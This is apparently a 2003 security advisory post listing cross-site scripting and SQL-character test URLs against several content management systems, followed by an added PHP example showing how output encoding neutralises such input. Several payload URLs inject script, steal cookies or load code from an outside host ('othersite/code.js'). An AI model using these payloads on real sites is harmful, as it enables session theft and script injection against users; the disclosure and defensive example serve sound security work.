Some XSS vulns
Mar 18 2003 11:59PM
Ertan Kurt (ertank olympos org)
While searching for a CMS for my site I found out the following:
ezPublish 2.2.7
http://target/search/?SectionIDOverride=1&SearchText=<script>alert(document.cookie);</script>
Also, when a URL like
http://target/<script>alert('test')</script>
is entered and the site admin checks the latest served URLs, the script will run.
Vendor Site: http://www.ez.no
DCP-Portal v5.3.1
http://target/search.php?fields=content&q=<script%20src=http://othersite/code.js></script>
http://target/calendar.php?year=<script>alert(document.cookie);</script>&month=03&day=05
Vendor Site: http://www.dcp-portal.org
Nuked-klan 1.3b
It doesn't work if it starts with <script, but by adding a "> the script will run
http://target/index.php?file=Liens&op="><script>alert('test');</script>
Vendor Site: http://www.nuked-klan.org
Siteframe 2.2.4
Same "> issue here
http://target/search.php?searchfor="><script>alert('test');</script>
http://target/download.php?id=2% (shows some info)
Vendor Site: http://www.siteframe.org
Mambo Site Server 4.0 build 10
http://target/index.php?option=search&searchword=<script>alert(document.cookie);</script>
Vendor Site: http://www.mamboserver.com
Basit cms 1.0
Content module: // Some sql chars and unwanted behaviour (loop->DoS?)
http://target/modules/Content/?op=sec&s=--
http://target/modules/Content/?op=sec&s='
http://target/modules/Content/?op=sec&s=;
Submit module:
http://target/modules/Submit/index.php?op=pre&title=<script%20src="http://othersite/code.js">test</script>
http://target/modules/Submit/index.php?op=pre&title=<script>alert(document.cookie);</script>
Search module:
http://target/modules/Search/index.php?q="><script+src=http://othersite/code.js></script>&op=search
Vendor Site: http://basitonline.com
Ertan Kurt
Olympos Security
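Added example, not part of the original post and not code from any of the listed products: a search value written into a quoted HTML attribute, first unencoded and then encoded with htmlspecialchars(), with the output parsed to count real script elements. It assumes the parameter is reflected inside a double-quoted attribute, which is consistent with the "> observation in the Nuked-klan and Siteframe entries but is not confirmed by the post; the markup and function names are hypothetical, and PHP's DOM extension is required.

```php
<?php
// Added illustration. The markup and function names are hypothetical and
// are not taken from any of the products listed in the post.

// Unsafe: the request value is concatenated into a quoted attribute as-is.
function render_unsafe(string $q): string
{
    return '<input type="text" name="searchfor" value="' . $q . '">';
}

// Hardened: HTML-encode at output time. ENT_QUOTES encodes " and ' as well
// as < > &, so the value cannot close the attribute it is written into.
function render_safe(string $q): string
{
    $enc = htmlspecialchars($q, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="searchfor" value="' . $enc . '">';
}

// Parse the output with an HTML parser and count real <script> elements,
// as opposed to the string "<script" sitting inertly inside an attribute.
function script_elements(string $html): int
{
    $prev = libxml_use_internal_errors(true);   // silence parser warnings
    $doc = new DOMDocument();
    $doc->loadHTML('<html><body>' . $html . '</body></html>');
    libxml_clear_errors();
    libxml_use_internal_errors($prev);
    return $doc->getElementsByTagName('script')->length;
}

// Constructed inputs, modelled on the parameter values in the post.
$samples = [
    'no prefix'   => "<script>alert('test');</script>",
    'with ">'     => "\"><script>alert('test');</script>",
    'benign text' => 'O\'Reilly "web security"',
];

foreach ($samples as $label => $q) {
    printf("%-12s unencoded: %d script element(s), encoded: %d\n",
        $label,
        script_elements(render_unsafe($q)),
        script_elements(render_safe($q)));
}

// The encoded form of the "> input stays inside the value attribute.
echo render_safe($samples['with ">']), "\n";
```

Encoding at the point of output, rather than filtering input for "<script", is what keeps the benign sample with quotes intact while neutralising the other two.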